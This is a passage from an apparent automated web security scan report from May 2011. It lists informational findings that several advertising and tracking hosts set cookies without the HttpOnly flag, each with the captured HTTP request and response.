Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

11.35. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; domain=.interclick.com; expires=Sun, 09-May-2021 15:37:51 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:50 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

11.36. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.37. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=media27_cs=1&betq=13111=435181 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=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; GUID=MTMwNDk1NDk4OTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=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; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: GUID=MTMwNDk1NTM4MzsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 16:36:23 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.38. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=6169&pcv=48&cb=8467213627&topHref=http%3A%2F%2Fwww.csmonitor.com%2FBusiness HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt11400gxzt1tr37xzt1tr37xzt11400gxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh1443x0113l040k0450n; rdrlst=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; sglst=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; vstcnt=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh144d60123l050k0550o; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: vstcnt=417k010r154exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=l3pmCL-AvwIQi4DI6wM&amp;guid=ON&amp;script=0
Content-Length: 0
Date: Mon, 09 May 2011 15:35:19 GMT


11.39. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.4678053397219628&sig=li HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:56 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955416503; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:56 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: recs-d70c1e5d44de8a9150eb91ecff563578="yoz9obW/2XhfIb4e31QLF+S7Xa4bySS399HA3bzA01t8TBqoY5+CsuLi96Cxd+UejaFla9pteKU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:56 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:56 GMT
Content-Length: 5444

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'ee2d80d8f79db75191b6df986070973c'},'score':{'preferred
...[SNIP]...

11.40. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.639346786076203&sig=d HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955408827; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: recs-8277e0910d750195b448797616e091ad="0Md6VLP4uVjlx5iB105rBFRGss1g9D1+UIrDZa62H8d9q/U+7rfsSHzfTAzVZtzvGFOIAx+Zi6c="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 5487

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'cfa057c0cd3cd3e521294623f49f9d62'},'score':{'preferred
...[SNIP]...

11.41. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:20 GMT
Content-Length: 593

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72132','D08734_72078','D08734_72122'
...[SNIP]...

11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 